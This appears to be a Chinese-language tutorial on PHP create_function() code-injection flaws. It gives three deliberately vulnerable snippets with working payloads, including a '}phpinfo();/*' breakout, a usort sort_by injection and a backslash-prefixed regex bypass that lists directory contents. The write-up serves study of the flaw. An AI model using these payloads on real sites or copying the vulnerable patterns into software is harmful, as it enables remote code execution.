create_function()注入命令执行漏洞

0x00 create_function()介绍

create_function()创建匿名函数

1
string create_function    ( string $args   , string $code   )

string $args 变量部分
string $code 方法代码部分

举例:

1
create_function('$name','echo $name."A"')

类似于:

1
2
3
function name($name) {
echo $name."A";
}

0x01 漏洞利用

1

1
2
3
4
5
6
7
8
9
10
11
12
<?php
//02-8.php?id=2;}phpinfo();/*
$id=$_GET['id'];
$str2='echo '.$a.'test'.$id.";";
echo $str2;
echo "<br/>";
echo "==============================";
echo "<br/>";
$f1 = create_function('$a',$str2);
echo "<br/>";
echo "==============================";
?>

payload:

1
http://localhost/libtest/02-8.php?id=2;}phpinfo();/*

原理:
id=2;}phpinfo();/*

执行函数为:

1
2
3
4
源代码:
function fT($a) {
echo "test".$a;
}

注入后代码:

1
2
3
4
function fT($a) {
echo "test";}
phpinfo();/*;//此处为注入代码。
}

2

1
2
3
4
5
6
7
8
<?php
//how to exp this code
$sort_by=$_GET['sort_by'];
$sorter='strnatcasecmp';
$databases=array('test','test');
$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';
usort($databases, create_function('$a, $b', $sort_function));
?>

payload:

1
func.php?sort_by="]);}phpinfo();/*

3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
error_reporting(0);
if(isset($_GET['action'])){
$action=$_GET['action'];
}
if(isset($_GET['action'])){
$arg=$_GET['arg'];
}
if(preg_match('/^[a-z0-9_]*$/isD',$action)){
show_sourse(_FILE_);
}else{
$action($arg,'');
}
?>

正则绕过,数字字母下划线都被禁止.
思路就是在开头或结尾插入字符绕过检测,涉及到php全局命名空间:在函数的头部加上 \就是调用全局的此函数,即\create_function()就是调用全局的create_function()函数,同时函数头部加上\可绕过正则过滤,\即%5c.

漏洞利用处$action($arg,’’);,也就是说如果利用create_function()函数漏洞,这里是参数为GET值,执行代码为空

payload:

1
ip/?action=%5ccreate_function&arg=){}var_dump(scandir("./"));/*
-------------本文结束感谢您的阅读-------------
/*
*/